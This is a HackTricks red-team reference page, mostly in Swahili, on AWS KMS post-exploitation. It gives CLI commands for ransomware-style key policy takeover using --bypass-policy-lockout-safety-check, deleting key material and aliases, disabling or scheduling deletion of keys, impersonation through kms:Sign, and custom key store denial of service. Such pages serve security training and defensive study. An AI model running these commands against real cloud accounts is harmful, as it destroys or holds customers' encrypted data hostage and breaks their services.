AWS - KMS Post Exploitation

Reading time: 7 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

KMS

For more information check:

AWS - KMS Enum

Encrypt/Decrypt taarifa

fileb:// na file:// ni schemes za URI zinazotumika katika AWS CLI commands kutaja njia ya faili za ndani:

  • fileb://: Inasoma faili kwa njia ya binary, kawaida hutumika kwa faili zisizo za maandishi.
  • file://: Inasoma faili kwa mode ya maandishi, kawaida hutumika kwa faili za maandishi rahisi, scripts, au JSON isiyo na mahitaji maalumu ya encoding.

tip

Kumbuka kwamba ikiwa unataka decrypt baadhi ya data ndani ya faili, faili lazima iwe na data ya binary, sio data iliyokuwa base64 encoded. (fileb://)

  • Using a symmetric key
bash
# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode
  • Kutumia ufunguo asimetriki:
bash
# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Mshambuliaji aliye na ufikiaji wa kipaumbele kwenye KMS anaweza kubadilisha sera za KMS za funguo na kumpa akaunti yake ufikiaji juu yao, akiondoa ufikiaji uliotolewa kwa akaunti halali.

Kisha, watumiaji wa akaunti halali hawawezi kupata taarifa za huduma yoyote iliyosimbwa kwa funguo hizo, na kuunda ransomware rahisi lakini yenye ufanisi juu ya akaunti hiyo.

warning

Kumbuka kwamba AWS managed keys aren't affected na shambulio hili — huathiriwa ni tu Customer managed keys.

Pia kumbuka uhitaji wa kutumia param --bypass-policy-lockout-safety-check (ukosefu wa chaguo hili katika web console unafanya shambulio hili liwe linawezekana tu kutoka CLI).

bash
# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

caution

Kumbuka kwamba ikiwa utabadilisha sera hiyo na kutoa ufikiaji kwa akaunti ya nje tu, na kuka kutoka akaunti hii ya nje ukajaribu kuweka sera mpya ili give the access back to original account, you won't be able cause the Put Polocy action cannot be performed from a cross account.

KMS Ransomware ya Kawaida

Kuna njia nyingine ya kutekeleza KMS Ransomware ya kimataifa, ambayo itahusisha hatua zifuatazo:

  • Unda key mpya yenye key material iliyingizwa na attacker
  • Re-encrypt older data ya victim iliyokuwa encrypted na version ya awali kwa kutumia ile mpya.
  • Delete the KMS key
  • Sasa ni attacker pekee, ambaye ana original key material, angeweza decrypt the encrypted data

Delete Keys via kms:DeleteImportedKeyMaterial

Kwa ruhusa ya kms:DeleteImportedKeyMaterial, mhusika anaweza kufuta imported key material kutoka kwa CMKs zenye Origin=EXTERNAL (CMKs ambazo zimeingiza key material yao), na hivyo kuzifanya zisifae kutengeneza upya (decrypt) data. Hatua hii ni ya uharibifu na haiwezi kurekebishwa isipokuwa material inayofaa iingizwe upya, ikimruhusu attacker kusababisha upotevu wa data wa aina ya ransomware-like kwa kufanya taarifa zilizofichwa zisizopatikana kabisa.

bash
aws kms delete-imported-key-material --key-id <Key_ID>

Kuangamiza funguo

Kwa kuangamiza funguo, inawezekana kusababisha DoS.

bash
# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7

caution

Fahamu kuwa AWS sasa inazuia vitendo vya awali kufanywa kutoka kwenye cross account:

Badilisha au futa Alias

Shambulio hili hufuta au kuelekeza upya AWS KMS aliases, kuharibu key resolution na kusababisha kushindwa mara moja kwa huduma yoyote inayotegemea aliases hizo, na kusababisha denial-of-service. Kwa ruhusa kama kms:DeleteAlias au kms:UpdateAlias mdukuzi anaweza kuondoa au kuelekeza aliases upya na kuathiri operesheni za kriptografia (mf., encrypt, describe). Huduma yoyote inayorejea alias badala ya key ID inaweza kushindwa hadi alias itakaporudishwa au kupangwa upya kwa usahihi.

bash
# Delete Alias
aws kms delete-alias --alias-name alias/<key_alias>

# Update Alias
aws kms update-alias \
--alias-name alias/<key_alias> \
--target-key-id <new_target_key>

Kughairi Ufutaji wa Ufunguo

Kwa ruhusa kama kms:CancelKeyDeletion na kms:EnableKey, mtendaji anaweza kughairi ufutaji uliopangwa wa AWS KMS customer master key na baadaye kuiwezesha tena. Kufanya hivyo kunarejesha ufunguo (mwanzoni katika Disabled state) na kurejesha uwezo wake wa ku-decrypt data iliyolindwa hapo awali, hivyo kuwezesha exfiltration.

bash
# Firts cancel de deletion
aws kms cancel-key-deletion \
--key-id <Key_ID>

## Second enable the key
aws kms enable-key \
--key-id <Key_ID>

Kuzima Ufunguo

Kwa ruhusa ya kms:DisableKey, mhusika anaweza kuzima AWS KMS customer master key (CMK), kuizuia isitumike kwa encryption au decryption. Hii inavunja upatikanaji kwa huduma yoyote inayotegemea CMK hiyo na inaweza kusababisha usumbufu wa haraka au denial-of-service hadi ufunguo uwezeshwe tena.

bash
aws kms disable-key \
--key-id <key_id>

Pata Siri ya Pamoja

Kwa ruhusa ya kms:DeriveSharedSecret, mhusika anaweza kutumia funguo binafsi iliyoshikiliwa na KMS pamoja na funguo ya umma iliyotolewa na mtumiaji ili kuhesabu siri ya pamoja ya ECDH.

bash
aws kms derive-shared-secret \
--key-id <key_id> \
--public-key fileb:///<route_to_public_key> \
--key-agreement-algorithm <algorithm>

Impersonation kupitia kms:Sign

Kwa idhini ya kms:Sign, mhusika anaweza kutumia KMS-stored CMK kusaini data kwa njia ya kriptografia bila kufichua private key, na kutengeneza saini halali ambazo zinaweza kuwezesha impersonation au kuruhusu vitendo vibaya.

bash
aws kms sign \
--key-id <key-id> \
--message fileb://<ruta-al-archivo> \
--signing-algorithm <algoritmo> \
--message-type RAW

DoS with Custom Key Stores

Kwa ruhusa kama kms:DeleteCustomKeyStore, kms:DisconnectCustomKeyStore, au kms:UpdateCustomKeyStore, mhusika anaweza kubadilisha, kutenganisha, au kufuta AWS KMS Custom Key Store (CKS), na kufanya vifunguo vyake vikuu visifanyi kazi. Hii inavunja operesheni za kusimbua, kufungua (decryption), na kusaini kwa huduma yoyote inayotegemea vifunguo hivyo na inaweza kusababisha denial-of-service mara moja. Kwa hivyo, ni muhimu kudhibiti na kufuatilia ruhusa hizo.

bash
aws kms delete-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms disconnect-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID>

aws kms update-custom-key-store --custom-key-store-id <CUSTOM_KEY_STORE_ID> --new-custom-key-store-name <NEW_NAME> --key-store-password <NEW_PASSWORD>

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks